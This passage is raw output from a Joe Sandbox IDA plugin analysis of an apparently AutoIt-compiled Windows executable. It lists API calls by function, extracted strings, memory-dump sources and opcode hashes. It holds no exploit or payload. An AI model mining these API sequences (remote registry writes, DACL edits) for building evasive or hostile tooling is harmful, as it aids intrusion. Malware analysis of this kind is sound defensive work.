                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D89
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D98
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA8
                        • GlobalFree.KERNEL32(00000000), ref: 003B2DB3
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DC5
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CFC38,00000000), ref: 003B2DDB
                        • GlobalFree.KERNEL32(00000000), ref: 003B2DEB
                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 003B2E11
                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003B2E30
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2E52
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B303F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                        • Instruction ID: 1de84994881bc7ba5186d394dc5446646b45e41f7bdbbae5efb9268e0dcd2ec8
                        • Opcode Fuzzy Hash: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                        • Instruction Fuzzy Hash: FD027C71910219AFDB16DF64CD89EAE7BB9EF49314F048518F919EB2A1CB70ED01CB60
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 003C712F
                        • GetSysColorBrush.USER32(0000000F), ref: 003C7160
                        • GetSysColor.USER32(0000000F), ref: 003C716C
                        • SetBkColor.GDI32(?,000000FF), ref: 003C7186
                        • SelectObject.GDI32(?,?), ref: 003C7195
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C71C0
                        • GetSysColor.USER32(00000010), ref: 003C71C8
                        • CreateSolidBrush.GDI32(00000000), ref: 003C71CF
                        • FrameRect.USER32(?,?,00000000), ref: 003C71DE
                        • DeleteObject.GDI32(00000000), ref: 003C71E5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003C7230
                        • FillRect.USER32(?,?,?), ref: 003C7262
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7284
                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
                          • Part of subcall function 003C73E8: SetTextColor.GDI32(?,?), ref: 003C7425
                          • Part of subcall function 003C73E8: GetSysColorBrush.USER32(0000000F), ref: 003C743B
                          • Part of subcall function 003C73E8: GetSysColor.USER32(0000000F), ref: 003C7446
                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000011), ref: 003C7463
                          • Part of subcall function 003C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,00000000), ref: 003C7482
                          • Part of subcall function 003C73E8: SetBkColor.GDI32(?,00000000), ref: 003C748B
                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,?), ref: 003C7498
                          • Part of subcall function 003C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                          • Part of subcall function 003C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                          • Part of subcall function 003C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                        • String ID:
                        • API String ID: 4124339563-0
                        • Opcode ID: 3984ef40b79429bd1c99559a4bb52de1c99b7419b84490aeac38f51ccb25850b
                        • Instruction ID: 287f7da80c1d5ea5cb6ab1ebe75e7da88d9714212613e536b2618f1be68aba8c
                        • Opcode Fuzzy Hash: 3984ef40b79429bd1c99559a4bb52de1c99b7419b84490aeac38f51ccb25850b
                        • Instruction Fuzzy Hash: 9FA19D72018301AFDB029F61DC48E6BBBA9FB89320F141A19F966D61E1D731F944CF91
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 003B273E
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B286A
                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003B28A9
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003B28B9
                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 003B2900
                        • GetClientRect.USER32(00000000,?), ref: 003B290C
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003B2955
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B2964
                        • GetStockObject.GDI32(00000011), ref: 003B2974
                        • SelectObject.GDI32(00000000,00000000), ref: 003B2978
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003B2988
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B2991
                        • DeleteDC.GDI32(00000000), ref: 003B299A
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B29C6
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B29DD
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 003B2A1D
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B2A31
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B2A42
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003B2A77
                        • GetStockObject.GDI32(00000011), ref: 003B2A82
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B2A8D
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003B2A97
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                        • Instruction ID: 47d3c41e0db9b6075c80a6dae26884b68283f6b53f1be8cacb8f46508ac3dabc
                        • Opcode Fuzzy Hash: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                        • Instruction Fuzzy Hash: 32B16F71A10215AFEB15DF69CD8AFAF7BA9EB09714F004114FA14EB6A0D770ED40CB54
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A4AED
                        • GetDriveTypeW.KERNEL32(?,003CCB68,?,\\.\,003CCC08), ref: 003A4BCA
                        • SetErrorMode.KERNEL32(00000000,003CCB68,?,\\.\,003CCC08), ref: 003A4D36
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: aa1d843e30b8bf25d6b1e2476a2d4acf56e6064aaaeca6166b66b9f1c96c6ff7
                        • Instruction ID: 8e601fa9b2b52eda7385b550fa07c232c82e35b140d6f3e6617f19caf608e3cb
                        • Opcode Fuzzy Hash: aa1d843e30b8bf25d6b1e2476a2d4acf56e6064aaaeca6166b66b9f1c96c6ff7
                        • Instruction Fuzzy Hash: 0061D330605309EBCB07DF28CA83DBC77B4EB86350B248415F90AABA56DBB1ED41DB51
                        APIs
                        • GetSysColor.USER32(00000012), ref: 003C7421
                        • SetTextColor.GDI32(?,?), ref: 003C7425
                        • GetSysColorBrush.USER32(0000000F), ref: 003C743B
                        • GetSysColor.USER32(0000000F), ref: 003C7446
                        • CreateSolidBrush.GDI32(?), ref: 003C744B
                        • GetSysColor.USER32(00000011), ref: 003C7463
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                        • SelectObject.GDI32(?,00000000), ref: 003C7482
                        • SetBkColor.GDI32(?,00000000), ref: 003C748B
                        • SelectObject.GDI32(?,?), ref: 003C7498
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C752A
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003C7554
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003C7572
                        • DrawFocusRect.USER32(?,?), ref: 003C757D
                        • GetSysColor.USER32(00000011), ref: 003C758E
                        • SetTextColor.GDI32(?,00000000), ref: 003C7596
                        • DrawTextW.USER32(?,003C70F5,000000FF,?,00000000), ref: 003C75A8
                        • SelectObject.GDI32(?,?), ref: 003C75BF
                        • DeleteObject.GDI32(?), ref: 003C75CA
                        • SelectObject.GDI32(?,?), ref: 003C75D0
                        • DeleteObject.GDI32(?), ref: 003C75D5
                        • SetTextColor.GDI32(?,?), ref: 003C75DB
                        • SetBkColor.GDI32(?,?), ref: 003C75E5
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: bc7343f4ffeee0de42d74e649a8a98b98cc63aff7a8ade4f3975eef2ce5bd6b2
                        • Instruction ID: 715b4e6cee5a6aebe8a912339a843f62d286d9c097b4e938db49f3cb53a7add1
                        • Opcode Fuzzy Hash: bc7343f4ffeee0de42d74e649a8a98b98cc63aff7a8ade4f3975eef2ce5bd6b2
                        • Instruction Fuzzy Hash: C8615972900218AFDB029FA5DC49EAEBFB9EB09320F155115F919EB2A1D771AD40CF90
                        APIs
                        • GetCursorPos.USER32(?), ref: 003C1128
                        • GetDesktopWindow.USER32 ref: 003C113D
                        • GetWindowRect.USER32(00000000), ref: 003C1144
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C1199
                        • DestroyWindow.USER32(?), ref: 003C11B9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C11ED
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C120B
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C121D
                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 003C1232
                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 003C1245
                        • IsWindowVisible.USER32(00000000), ref: 003C12A1
                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003C12BC
                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003C12D0
                        • GetWindowRect.USER32(00000000,?), ref: 003C12E8
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003C130E
                        • GetMonitorInfoW.USER32(00000000,?), ref: 003C1328
                        • CopyRect.USER32(?,?), ref: 003C133F
                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 003C13AA
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                        • Instruction ID: d072f7e5bcbb4962c96b3df070fe53ce5d5aba2c2707745c411075c11a1247f3
                        • Opcode Fuzzy Hash: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                        • Instruction Fuzzy Hash: 25B16671604341AFD711DF64C984F6ABBE8AB89344F00891CF999DB2A2C771EC44DB92
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 003C02E5
                        • _wcslen.LIBCMT ref: 003C031F
                        • _wcslen.LIBCMT ref: 003C0389
                        • _wcslen.LIBCMT ref: 003C03F1
                        • _wcslen.LIBCMT ref: 003C0475
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003C04C5
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C0504
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                          • Part of subcall function 0039223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00392258
                          • Part of subcall function 0039223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0039228A
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 1103490817-719923060
                        • Opcode ID: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                        • Instruction ID: 6d98e9eee2ffa1eadc5d12138b3a0e985c9b8d16ef9273168fcf4f26de49852d
                        • Opcode Fuzzy Hash: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
                        • Instruction Fuzzy Hash: BDE19B35208281CFCB1ADF24C591E2AB3E6BF89714F15495CF896AB6A1DB30ED45CB41
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00348968
                        • GetSystemMetrics.USER32(00000007), ref: 00348970
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0034899B
                        • GetSystemMetrics.USER32(00000008), ref: 003489A3
                        • GetSystemMetrics.USER32(00000004), ref: 003489C8
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003489E5
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003489F5
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00348A28
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00348A3C
                        • GetClientRect.USER32(00000000,000000FF), ref: 00348A5A
                        • GetStockObject.GDI32(00000011), ref: 00348A76
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00348A81
                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        • SetTimer.USER32(00000000,00000000,00000028,003490FC), ref: 00348AA8
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 868fd4454fe2f4e5f3e2338af3d2a93b3c171f7f3498dedcaf24a7313ad5ccf2
                        • Instruction ID: a6d4c405e7dc08f85e6c8a23f6d3b57781c2327a42bfb293571dc5b431fe5992
                        • Opcode Fuzzy Hash: 868fd4454fe2f4e5f3e2338af3d2a93b3c171f7f3498dedcaf24a7313ad5ccf2
                        • Instruction Fuzzy Hash: 6DB17D71A002099FDB16EFA8CD45FAE3BB5FB48314F114229FA15EB2A0DB74E940CB55
                        APIs
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390DF5
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390E29
                        • GetLengthSid.ADVAPI32(?), ref: 00390E40
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390E7A
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390E96
                        • GetLengthSid.ADVAPI32(?), ref: 00390EAD
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390EB5
                        • HeapAlloc.KERNEL32(00000000), ref: 00390EBC
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390EDD
                        • CopySid.ADVAPI32(00000000), ref: 00390EE4
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390F13
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390F35
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390F47
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F6E
                        • HeapFree.KERNEL32(00000000), ref: 00390F75
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F7E
                        • HeapFree.KERNEL32(00000000), ref: 00390F85
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F8E
                        • HeapFree.KERNEL32(00000000), ref: 00390F95
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390FA1
                        • HeapFree.KERNEL32(00000000), ref: 00390FA8
                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                        • Instruction ID: 591d971b0f1597b3d5939c7dfc5c3007eb66dd5c2b79112fbaf8c5791a471300
                        • Opcode Fuzzy Hash: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
                        • Instruction Fuzzy Hash: D871597290021AAFDF269FA5DC48FAEBBBCFF04300F054115F91AE6291D731AA05CB60
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BC4BD
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CCC08,00000000,?,00000000,?,?), ref: 003BC544
                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003BC5A4
                        • _wcslen.LIBCMT ref: 003BC5F4
                        • _wcslen.LIBCMT ref: 003BC66F
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 003BC6B2
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003BC7C1
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003BC84D
                        • RegCloseKey.ADVAPI32(?), ref: 003BC881
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BC88E
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003BC960
                        Similarity
                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 9721498-966354055
                        • Opcode ID: a44e56ba7eeef1045cc32d0ac30e5f1cacbda09f5e43cd4bfc2eb64beb08b22b
                        • Instruction ID: 6f11561fe6292c89576c63abb5bc83f46801c57097d88303a9f37c2d5e22fbd2
                        • Opcode Fuzzy Hash: a44e56ba7eeef1045cc32d0ac30e5f1cacbda09f5e43cd4bfc2eb64beb08b22b
                        • Instruction Fuzzy Hash: C01287752142009FDB26DF14C881E6AB7E5EF89718F05885DF98A9B7A2DB31FC41CB81
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 003C09C6
                        • _wcslen.LIBCMT ref: 003C0A01
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C0A54
                        • _wcslen.LIBCMT ref: 003C0A8A
                        • _wcslen.LIBCMT ref: 003C0B06
                        • _wcslen.LIBCMT ref: 003C0B81
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                          • Part of subcall function 00392BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00392BFA
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 1103490817-4258414348
                        • Opcode ID: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                        • Instruction ID: f24ed68e8ecccad1ec1a7c4a5ff5d992e74fbc8c0b3e2e6e820fd2c4bb57b205
                        • Opcode Fuzzy Hash: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                        • Instruction Fuzzy Hash: D0E17935208741DFCB1AEF28C490A2AB7E1BF98314F15895CF8969B762D731ED45CB81
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 1256254125-909552448
                        • Opcode ID: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                        • Instruction ID: 0d3f1788521cc8f6aa39382c0ff705bae852c994b1549ed7e359c294a2a97f2a
                        • Opcode Fuzzy Hash: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                        • Instruction Fuzzy Hash: 5C71163262012A8BCB32DE3CCD415FF3795AB60758F262128FE55ABA85E731DD4583A0
                        APIs
                        • _wcslen.LIBCMT ref: 003C835A
                        • _wcslen.LIBCMT ref: 003C836E
                        • _wcslen.LIBCMT ref: 003C8391
                        • _wcslen.LIBCMT ref: 003C83B4
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003C83F2
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C5BF2), ref: 003C844E
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8487
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003C84CA
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8501
                        • FreeLibrary.KERNEL32(?), ref: 003C850D
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003C851D
                        • DestroyIcon.USER32(?,?,?,?,?,003C5BF2), ref: 003C852C
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003C8549
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003C8555
                        Similarity
                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                        • String ID: .dll$.exe$.icl
                        • API String ID: 799131459-1154884017
                        • Opcode ID: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                        • Instruction ID: dbf1df8364cc47aaf3a4433a38a89b3db209f552023ece8fd9f1ca7503793675
                        • Opcode Fuzzy Hash: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                        • Instruction Fuzzy Hash: E661DF71500219BAEB1ADF65CC81FBE77ACBB05B11F10460AF915DA0D1DBB4AE90CBA0
                        Similarity
                        • API ID:
                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 0-1645009161
                        • Opcode ID: 065679f7e1244bd29674624441765974dbadef7e2620adbef24e8ef5999a3f20
                        • Instruction ID: 33e84e0f95355229927dca2fb428bd8f31c398fae41fb9122931e4e88fdf4af3
                        • Instruction Fuzzy Hash: FA81E5B1A04605BBDB37AF60CC83FBE77A8AF15301F058025F909AE192EBB5D945C791
                        APIs
                        • LoadIconW.USER32(00000063), ref: 00395A2E
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00395A40
                        • SetWindowTextW.USER32(?,?), ref: 00395A57
                        • GetDlgItem.USER32(?,000003EA), ref: 00395A6C
                        • SetWindowTextW.USER32(00000000,?), ref: 00395A72
                        • GetDlgItem.USER32(?,000003E9), ref: 00395A82
                        • SetWindowTextW.USER32(00000000,?), ref: 00395A88
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00395AA9
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00395AC3
                        • GetWindowRect.USER32(?,?), ref: 00395ACC
                        • _wcslen.LIBCMT ref: 00395B33
                        • SetWindowTextW.USER32(?,?), ref: 00395B6F
                        • GetDesktopWindow.USER32 ref: 00395B75
                        • GetWindowRect.USER32(00000000), ref: 00395B7C
                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00395BD3
                        • GetClientRect.USER32(?,?), ref: 00395BE0
                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00395C05
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00395C2F
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                        • String ID:
                        • API String ID: 895679908-0
                        • Opcode ID: f89c70822905873ccd8d2efd8f26344a064b5b7b044f32abbe24a23b6e0bc86e
                        • Instruction ID: 9d155fa364839b97715f5940dc23709533ce2c72d559c11c906c59d1bfcf24d3
                        • Instruction Fuzzy Hash: E7716C31900B09AFDF22DFA8CE85E6EBBF9FF48704F104518E586A65A0D775A990CB50
                        Similarity
                        • API ID: _wcslen
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[?
                        • API String ID: 176396367-1448639043
                        • Opcode ID: 177f9012f259230eaef32e03a4e049040d473e58597badfbf6ba2b8fdd91261e
                        • Instruction ID: a555c3974ee41f83575249f658547f4227308302b012e0a1f58f26fc0f89f15f
